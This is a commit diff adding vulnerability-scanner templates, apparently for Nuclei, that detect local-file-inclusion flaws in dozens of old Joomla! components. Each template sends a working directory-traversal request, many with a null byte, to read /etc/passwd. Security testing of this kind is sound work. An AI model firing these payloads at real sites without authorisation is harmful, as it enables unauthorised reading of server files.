Update 8.4.9

main
daffainfo 2021-09-02 15:03:02 +07:00
parent c6dbad9e02
commit 2937fc272b
103 changed files with 1242 additions and 74 deletions

27
CVE-2008-4668.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2008-4668
info:
name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/6618
- https://www.cvedetails.com/cve/CVE-2008-4668
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action. description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
reference: | reference:
- https://www.exploit-db.com/exploits/5435 - https://www.exploit-db.com/exploits/5435
- https://www.cvedetails.com/cve/CVE-2008-4764 - https://www.cvedetails.com/cve/CVE-2008-4764
tags: cve,cve2008,joomla,lfi tags: cve,cve2008,joomla,lfi

27
CVE-2008-6172.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2008-6172
info:
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
reference:
- https://www.exploit-db.com/exploits/6817
- https://www.cvedetails.com/cve/CVE-2008-6172
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter. description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
reference: | reference:
- https://www.exploit-db.com/exploits/36994 - https://www.exploit-db.com/exploits/36994
- https://www.cvedetails.com/cve/CVE-2009-5114 - https://www.cvedetails.com/cve/CVE-2009-5114
tags: cve,cve2009,lfi tags: cve,cve2009,lfi

27
CVE-2010-0943.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0943
info:
name: Joomla! Component com_jashowcase - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
reference:
- https://www.exploit-db.com/exploits/11090
- https://www.cvedetails.com/cve/CVE-2010-0943
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: | reference:
- https://www.exploit-db.com/exploits/11088 - https://www.exploit-db.com/exploits/11088
- https://www.cvedetails.com/cve/CVE-2010-0944 - https://www.cvedetails.com/cve/CVE-2010-0944
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi

27
CVE-2010-0985.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0985
info:
name: Joomla! Component com_abbrev - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/10948
- https://www.cvedetails.com/cve/CVE-2010-0985
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

26
CVE-2010-1219.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2010-1219
info:
name: Joomla! Component com_janews - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11757
- https://www.cvedetails.com/cve/CVE-2010-1219
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1304.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1304
info:
name: Joomla! Component User Status - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11998
- https://www.cvedetails.com/cve/CVE-2010-1304
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1305.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1305
info:
name: Joomla! Component JInventory 1.23.02 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12065
- https://www.cvedetails.com/cve/CVE-2010-1305
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1306.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1306
info:
name: Joomla! Component Picasa 2.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12058
- https://www.cvedetails.com/cve/CVE-2010-1306
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1314.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1314
info:
name: Joomla! Component Highslide 1.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12086
- https://www.cvedetails.com/cve/CVE-2010-1314
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1345.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1345
info:
name: Joomla! Component Cookex Agency CKForms - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/15453
- https://www.cvedetails.com/cve/CVE-2010-1345
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1353.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1353
info:
name: Joomla! Component LoginBox - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12068
- https://www.cvedetails.com/cve/CVE-2010-1353
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1354.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1354
info:
name: Joomla! Component VJDEO 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12102
- https://www.cvedetails.com/cve/CVE-2010-1354
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1471.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1471
info:
name: Joomla! Component Address Book 1.5.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12170
- https://www.cvedetails.com/cve/CVE-2010-1471
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1474.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1474
info:
name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12182
- https://www.cvedetails.com/cve/CVE-2010-1474
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1475.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1475
info:
name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12147
- https://www.cvedetails.com/cve/CVE-2010-1475
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1494.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1494
info:
name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12113
- https://www.cvedetails.com/cve/CVE-2010-1494
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1495.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1495
info:
name: Joomla! Component Matamko 1.01 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12286
- https://www.cvedetails.com/cve/CVE-2010-1495
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1532.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1532
info:
name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12118
- https://www.cvedetails.com/cve/CVE-2010-1532
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1533.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1533
info:
name: Joomla! Component TweetLA 1.0.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12142
- https://www.cvedetails.com/cve/CVE-2010-1533
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1535.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1535
info:
name: Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12151
- https://www.cvedetails.com/cve/CVE-2010-1535
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1601.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1601
info:
name: Joomla! Component JA Comment - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12236
- https://www.cvedetails.com/cve/CVE-2010-1601
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1602.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1602
info:
name: Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12283
- https://www.cvedetails.com/cve/CVE-2010-1602
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1657.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1657
info:
name: Joomla! Component SmartSite 1.0.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12428
- https://www.cvedetails.com/cve/CVE-2010-1657
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1659.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1659
info:
name: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12426
- https://www.cvedetails.com/cve/CVE-2010-1659
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1714.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1714
info:
name: Joomla! Component Arcade Games 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12168
- https://www.cvedetails.com/cve/CVE-2010-1714
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1717.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1717
info:
name: Joomla! Component iF surfALERT 1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12291
- https://www.cvedetails.com/cve/CVE-2010-1717
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1718.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1718
info:
name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12282
- https://www.cvedetails.com/cve/CVE-2010-1718
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1722.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1722
info:
name: Joomla! Component Online Market 2.x - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12177
- https://www.cvedetails.com/cve/CVE-2010-1722
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1875.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1875
info:
name: Joomla! Component Property - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11851
- https://www.cvedetails.com/cve/CVE-2010-1875
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1953.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1953
info:
name: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12288
- https://www.cvedetails.com/cve/CVE-2010-1953
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1954.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1954
info:
name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12287
- https://www.cvedetails.com/cve/CVE-2010-1954
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1955.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1955
info:
name: Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12238
- https://www.cvedetails.com/cve/CVE-2010-1955
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: | reference:
- https://www.exploit-db.com/exploits/12088 - https://www.exploit-db.com/exploits/12088
- https://www.cvedetails.com/cve/CVE-2010-1979 - https://www.cvedetails.com/cve/CVE-2010-1979
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi

27
CVE-2010-1980.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1980
info:
name: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12085
- https://www.cvedetails.com/cve/CVE-2010-1980
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1981.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1981
info:
name: Joomla! Component Fabrik 2.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12087
- https://www.cvedetails.com/cve/CVE-2010-1981
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php
reference: | reference:
- https://www.exploit-db.com/exploits/12055 - https://www.exploit-db.com/exploits/12055
- https://www.cvedetails.com/cve/CVE-2010-1983 - https://www.cvedetails.com/cve/CVE-2010-1983
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi

27
CVE-2010-2033.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2033
info:
name: Joomla Percha Categories Tree 0.6 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html
- https://www.cvedetails.com/cve/CVE-2010-2033
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-2035.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2035
info:
name: Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/34006
- https://www.cvedetails.com/cve/CVE-2010-2035
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-2036.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2036
info:
name: Joomla! Component Percha Fields Attach 1.0 - Directory Traversal
author: daffainfo
severity: high
